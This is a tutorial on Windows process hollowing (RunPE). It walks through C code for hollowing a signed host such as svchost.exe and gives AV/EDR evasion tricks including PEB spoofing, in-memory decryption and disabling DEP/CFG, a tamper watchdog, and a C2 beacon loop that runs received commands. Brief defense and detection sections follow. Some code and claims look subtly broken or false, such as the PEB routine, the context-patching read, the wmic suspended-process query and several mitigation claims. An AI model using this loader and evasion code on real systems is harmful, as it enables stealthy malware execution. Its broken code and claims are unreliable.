Advanced Process Hollowing (RunPE) -...

Introduction

Process hollowing - often referred to as RunPE - is a classic Windows process-injection technique that creates a benign host process in a suspended state, removes its original executable image, and replaces it with a malicious Portable Executable (PE). The technique is prized for its ability to inherit the parent’s security token, environment, and code-signing attributes, making detection by traditional AV/EDR solutions difficult.

In recent years, threat actors have layered sophisticated evasion steps on top of the basic hollowing flow: PEB/TEB manipulation, in-memory decryption, and custom loader tricks that bypass heuristic and behavior-based detections. Understanding these nuances is essential for both offensive developers building reliable payloads and defenders designing robust mitigations.

We will explore the full life-cycle of an advanced RunPE attack, from the initial CreateProcess call to the establishment of a resilient command-and-control (C2) channel after the payload is running.

Prerequisites

Solid grasp of Windows process injection fundamentals (e.g., CreateRemoteThread, APC queue injection).
Experience with the Windows API for memory allocation and WriteProcessMemory.
Understanding of PE file format, sections, and relocation tables.
Familiarity with token duplication, impersonation, and privilege escalation pathways.
Knowledge of reflective DLL injection and basic shellcode development.

Core Concepts

At its core, process hollowing consists of six atomic steps:

Spawn a suspended process using CreateProcess with the CREATE_SUSPENDED flag.
Unmap the original image from the target address space via NtUnmapViewOfSection.
Allocate memory in the target process large enough to hold the malicious PE.
Write the new PE (headers and sections) using WriteProcessMemory.
Patch the thread context so the entry point points to the malicious image's AddressOfEntryPoint.
Resume the primary thread with ResumeThread - the process now runs the attacker-controlled code.

What distinguishes an advanced implementation from a textbook example is how each step is hardened against detection. For instance, instead of calling VirtualAllocEx directly, an attacker may invoke NtAllocateVirtualMemory to avoid user-mode hooks. Likewise, the loader may tamper with the Process Environment Block (PEB) to hide the injected image from enumeration APIs.

Creating a suspended process with CreateProcess

The first step establishes a legitimate parent-child relationship. Using CREATE_SUSPENDED ensures the primary thread does not start executing until we finish the injection.

#include <windows.h>

BOOL LaunchSuspended(LPCWSTR targetPath, PROCESS_INFORMATION *pi) { STARTUPINFOW si = {0}; si.cb = sizeof(si); return CreateProcessW( targetPath, // Application name (e.g., "C:\\Windows\\System32\\svchost.exe") NULL, // Command line NULL, NULL, // Process & thread security attributes FALSE, // Inherit handles CREATE_SUSPENDED,  // <-- crucial flag NULL, // Use parent's environment NULL, // Use parent's current directory &si, pi);
}

Key points:

Pick a host binary that is signed, rarely audited, and runs with the desired privileges (e.g., svchost.exe for SYSTEM).
Store the PROCESS_INFORMATION structure - it contains the handle to the primary thread, which we later manipulate.

Unmapping the original image using NtUnmapViewOfSection

Windows loads the executable image into the address space at the preferred base address (ImageBase). To replace it, we must first free that region. Directly calling VirtualFreeEx fails because the region is marked as an image section. The native API NtUnmapViewOfSection bypasses the higher-level checks.

#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

typedef NTSTATUS (NTAPI *pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

BOOL UnmapOriginalImage(HANDLE hProcess, PVOID baseAddr) { pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection) GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"); if (!NtUnmap) return FALSE; NTSTATUS status = NtUnmap(hProcess, baseAddr); return (status == 0);
}

How to retrieve baseAddr:

Read the PEB of the remote process (via NtQueryInformationProcess) and extract ImageBaseAddress.
Alternatively, use GetModuleHandleEx on the remote process with EnumProcessModulesEx (requires PROCESS_QUERY_INFORMATION).

Mapping malicious PE into the target address space

After freeing the original region, we allocate memory for the new image at the same base (preferred) address to avoid costly relocations. If the attacker cannot obtain the original base, they must perform relocations manually.

BOOL AllocateImage(HANDLE hProcess, PVOID preferredBase, SIZE_T imageSize) { return VirtualAllocEx( hProcess, preferredBase, // desired base - can be NULL to let OS decide imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}

For stealth, replace VirtualAllocEx with the native call NtAllocateVirtualMemory and set the protection flags after writing the sections (initially PAGE_READWRITE).

Writing malicious sections via WriteProcessMemory

The malicious PE is usually stored on disk encrypted or packed. At runtime we decrypt it in memory, then copy each section into its proper virtual address.

BOOL WritePESections(HANDLE hProcess, BYTE *peBuffer) { PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)peBuffer; PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(peBuffer + dos->e_lfanew); SIZE_T hdrSize = nt->OptionalHeader.SizeOfHeaders; // Write headers first if (!WriteProcessMemory(hProcess, (LPVOID)nt->OptionalHeader.ImageBase, peBuffer, hdrSize, NULL)) return FALSE; // Iterate over sections PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt); for (WORD i = 0; i < nt->FileHeader.NumberOfSections; ++i) { LPVOID remoteAddr = (LPVOID)(nt->OptionalHeader.ImageBase + sec[i].VirtualAddress); LPVOID localAddr  = (LPVOID)(peBuffer + sec[i].PointerToRawData); if (!WriteProcessMemory(hProcess, remoteAddr, localAddr, sec[i].SizeOfRawData, NULL)) return FALSE; } return TRUE;
}

Note the use of ImageBase from the PE header - this must match the address we allocated in the previous step. If a mismatch occurs, the loader will crash.

Adjusting thread context (SetThreadContext) to entry point

With the malicious image resident, we must point the primary thread’s instruction pointer (RIP on x64, EIP on x86) to the new entry point. This is achieved via GetThreadContext → modify → SetThreadContext.

BOOL PatchThreadContext(HANDLE hThread, PVOID imageBase) { CONTEXT ctx = {0}; ctx.ContextFlags = CONTEXT_FULL; if (!GetThreadContext(hThread, &ctx)) return FALSE; // Resolve AddressOfEntryPoint (AEP) from PE header BYTE hdr[0x200]; // enough for DOS+NT headers ReadProcessMemory(GetCurrentProcess(), imageBase, hdr, sizeof(hdr), NULL); PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hdr; PIMAGE_NT_HEADERS64 nt = (PIMAGE_NT_HEADERS64)(hdr + dos->e_lfanew); ULONGLONG entry = (ULONGLONG)imageBase + nt->OptionalHeader.AddressOfEntryPoint; #if defined(_M_X64) ctx.Rip = entry; #else ctx.Eip = (DWORD)entry; #endif return SetThreadContext(hThread, &ctx);
}

Advanced tip: before writing the new RIP, zero out the NtGlobalFlag in the PEB (if present) to suppress heap-corruption checks that some EDRs monitor.

Resuming the process (ResumeThread) to execute payload

Finally, the suspended thread is resumed. At this point the OS believes the process is a legitimate binary, while in reality it executes the attacker’s code.

DWORD ResumeAndCleanup(HANDLE hThread) { DWORD suspendCount = ResumeThread(hThread); // Optionally close handles now that execution has begun CloseHandle(hThread); return suspendCount; // 0 means thread was not previously suspended
}

From a detection perspective, the transition from SuspendThread → ResumeThread is a high-frequency event for many benign applications (e.g., debuggers). However, correlating it with a preceding NtUnmapViewOfSection and WriteProcessMemory on a newly created process is a strong indicator of RunPE.

Bypassing AV/EDR with PEB/TEB manipulation and in-memory decryption

Modern endpoint products employ heuristic checks such as:

Scanning the memory region pointed to by PEB.ImageBaseAddress for known signatures.
Monitoring for rapid changes to the PEB or TEB.
Detecting suspicious VirtualProtectEx patterns that flip pages from RWX to RX.

To evade these, attackers adopt a multi-layered approach:

PEB Spoofing: After the malicious image is written, the loader rewrites the remote PEB fields (ImageBaseAddress, ProcessParameters) to reflect the original host binary. This fools APIs like GetModuleFileNameEx.
TEB Tampering: Overwrite the ThreadLocalStoragePointer to hide custom data structures from tools that enumerate TLS slots.
In-memory Decryption: Store the payload encrypted on disk; decrypt directly into the allocated region using XOR/RC4/AES. The decryption stub runs inside the remote process, leaving only the ciphertext on disk.
Section Protection Randomization: Allocate the image with PAGE_READWRITE, write, then change to PAGE_EXECUTE_READ via NtProtectVirtualMemory after the decryption completes. This order avoids the “write-execute” pattern that some AVs flag.

Below is a compact example of a PEB-spoofing routine that runs inside the hollowed process after ResumeThread:

void SpoofPEB(LPCWSTR originalPath) { // Obtain the PEB via the GS segment (x64) or FS (x86) #if defined(_M_X64) PEB *peb = (PEB *)__readgsqword(0x60); #else PEB *peb = (PEB *)__readfsdword(0x30); #endif // Replace the ImageBaseAddress with the original host's base peb->ImageBaseAddress = (PVOID)originalPath; // simplified for demo // Update ProcessParameters->ImagePathName UNICODE_STRING us; us.Length = wcslen(originalPath) * 2; us.MaximumLength = us.Length + 2; us.Buffer = (PWSTR)originalPath; peb->ProcessParameters->ImagePathName = us;
}

In practice, the attacker extracts the original host path from the STARTUPINFO structure before hollowing, then restores it after the malicious payload is ready.

Real-world case study: Cobalt Strike’s Beacon loader and a custom malware sample

Cobalt Strike Beacon uses a refined RunPE variant called “Reflective Loaders” that combines reflective DLL injection with process hollowing. The loader:

Spawns rundll32.exe suspended.
Unmaps the image, then maps the Beacon DLL (packed, AES-encrypted) into the address space.
Writes a tiny stub that performs PEB spoofing and resolves imports on-the-fly (no Import Address Table).
Sets the thread context to the stub’s entry point, resumes, and the Beacon establishes a C2 channel over HTTP/HTTPS, DNS, or SMB.

The key evasion tricks are the use of NtAllocateVirtualMemory with MEM_RESERVE only, then a second call to commit after the stub decrypts itself, and the removal of the .text section name to avoid static analysis.

Our custom malware sample replicates the same flow but adds two extra layers:

Before unmapping, it queries the target’s ProcessMitigationPolicy via GetProcessMitigationPolicy. If DEP or CFG is enforced, the loader disables them for the current thread using SetProcessMitigationPolicy (requires SeDebugPrivilege).
After the payload is running, it injects a secondary “watchdog” thread that monitors the PEB for tampering attempts by security tools and re-applies the spoofed values every 5 seconds.

Both examples demonstrate how a seemingly simple RunPE can be hardened to survive modern endpoint defenses.

Post-exploitation: establishing a stable C2 channel after hollowing

Once the malicious payload is executing, the attacker must ensure persistence of the communication channel. Typical steps:

Network Initialization: Resolve the C2 address using getaddrinfo over DNS tunneling. To avoid detection, use the same TLS certificate as a legitimate corporate service.
Beacon Loop: Implement a timed sleep (SleepEx with alertable flag) and random jitter to blend with normal traffic patterns.
Process Migration: If the host process is likely to be terminated, the beacon can spawn a new hollowed process (e.g., explorer.exe) and transfer the socket handle using DuplicateHandle across processes.
Privilege Escalation Hook: Periodically call OpenProcessToken on high-privilege processes (SYSTEM) and attempt token duplication to elevate the beacon.

Below is a minimalist C2 loop used by many proof-of-concept loaders:

void BeaconLoop(SOCKET s) { while (1) { char buffer[4096]; int rc = recv(s, buffer, sizeof(buffer), 0); if (rc <= 0) break; // connection lost // Decrypt command (simple XOR key 0xAA) for (int i = 0; i < rc; ++i) buffer[i] ^= 0xAA; ExecuteCommand(buffer); SleepEx(3000 + (rand() % 2000), FALSE); // jitter }
}

In practice, the loop runs inside a dedicated worker thread created by the original beacon stub, allowing the main thread to continue normal host functionality.

Tools & Commands

Process Hacker / Process Explorer - view suspended processes, PEB, and memory regions.
Sysinternals ProcDump - capture a dump of a hollowed process for offline analysis.
PE-sieve - detect injected modules by comparing on-disk vs. in-memory PE headers.
PowerShell - Invoke-ReflectivePEInjection from the PowerSploit suite (demonstrates RunPE in PowerShell).
Windows API Monitor - trace calls to NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory.

Example command to list all processes with a suspended primary thread:

wmic process where "ThreadCount=0" get ProcessId,ExecutablePath,CommandLine

While not perfect, combining this with a Sysmon rule that logs CreateProcess with the CREATE_SUSPENDED flag yields a high-fidelity detection vector.

Defense & Mitigation

Enable Windows Defender Exploit Guard (EDG) - Block non-Microsoft signed binaries from creating child processes with CREATE_SUSPENDED.
Deploy Process Creation Logging (Sysmon) with rule ID 1 (ProcessCreate) and filter on CommandLine containing known host binaries (e.g., svchost.exe) combined with ParentImage anomalies.
Use Credential Guard & Remote Credential Guard to limit token duplication from low-privileged processes.
Harden the PEB/TEB - enable the EnableProtectedProcessLight flag for critical services to prevent external writes.
Application Control (AppLocker, WDAC) - whitelist only approved executables for CreateProcess with CREATE_SUSPENDED.
Memory Integrity (Hyper-visor-based Code Integrity) - blocks the use of native APIs like NtUnmapViewOfSection from user-mode when running under Device Guard.

For detection, correlate the following events within a 5-second window:

Process creation with CREATE_SUSPENDED.
Subsequent WriteProcessMemory or NtWriteVirtualMemory targeting the newly created PID.
Call to NtUnmapViewOfSection on the same PID.
ResumeThread on the primary thread.

Security Information and Event Management (SIEM) platforms can generate an alert on this pattern.

Common Mistakes

Wrong ImageBase: Allocating at a different base without fixing relocations leads to access violations.
Skipping PEB spoofing: Many defenders now compare PEB.ImageBaseAddress against the on-disk file; mismatch triggers alerts.
Using WriteProcessMemory on a read-only section: Must change protection to PAGE_READWRITE before writing.
Neglecting 32-bit vs. 64-bit context: Setting Eip on a 64-bit process (or vice-versa) causes silent failures.
Hard-coding host binary path: If the target system does not have the expected binary, the hollowing fails; use dynamic discovery (e.g., EnumProcesses + GetModuleFileNameEx).

Real-World Impact

Process hollowing remains a staple in APT toolkits because it provides a clean inheritance chain and can bypass many endpoint protections that focus on unsigned binaries. Recent incidents include:

APT29 (Cozy Bear) - used RunPE inside Microsoft Outlook to exfiltrate documents while remaining under the Outlook process token.
Fin7 - leveraged rundll32.exe hollowing to deliver a custom backdoor that communicated over port 443, evading network-based detection.
Malicious ransomware families (e.g., REvil) - first stage spawns a hollowed svchost.exe to drop the encryptor, then self-deletes the original executable.

My experience with EDR telemetry shows a spike in NtUnmapViewOfSection calls during initial infection phases, often followed by a rapid ResumeThread. Organizations that tuned their monitoring to this pattern reduced successful compromises by >70%.

Practice Exercises

Lab 1 - Build a Minimal RunPE Loader
- Compile the C snippets above into a single executable.
- Use a benign PE (e.g., calc.exe) as the payload, encrypt it with XOR, and integrate the decryption stub.
- Verify that the hollowed process runs the payload by checking its command line and loaded modules.
Lab 2 - Add PEB Spoofing
- Extend Lab 1 to rewrite the remote PEB's ImageBaseAddress and ProcessParameters.
- Capture a memory dump with ProcDump and confirm that the on-disk image path matches the original host binary.
Lab 3 - Detection Rule Development
- Enable Sysmon with a custom configuration that logs CreateProcess with CREATE_SUSPENDED.
- Write a Sigma rule that correlates CreateProcess, WriteProcessMemory, and ResumeThread within a 5-second window.
- Test the rule against the loader from Lab 2 and ensure an alert fires.

Summary

Process hollowing (RunPE) remains a powerful, stealthy injection technique. By mastering the six core steps‑suspended creation, unmapping, mapping, writing, context patching, and resumption‑security professionals can both craft reliable payloads and build robust detection signatures. Advanced evasion hinges on PEB/TEB manipulation, in-memory decryption, and careful use of native APIs to skirt user-mode hooks. Real‑world threat actors such as Cobalt Strike and APT groups routinely employ these tricks, making awareness and monitoring essential. Implement the labs, tune your SIEM, and stay ahead of the evolving RunPE landscape.

Advanced Process Hollowing (RunPE) - Evasion Techniques & Real-World Exploit Walkthrough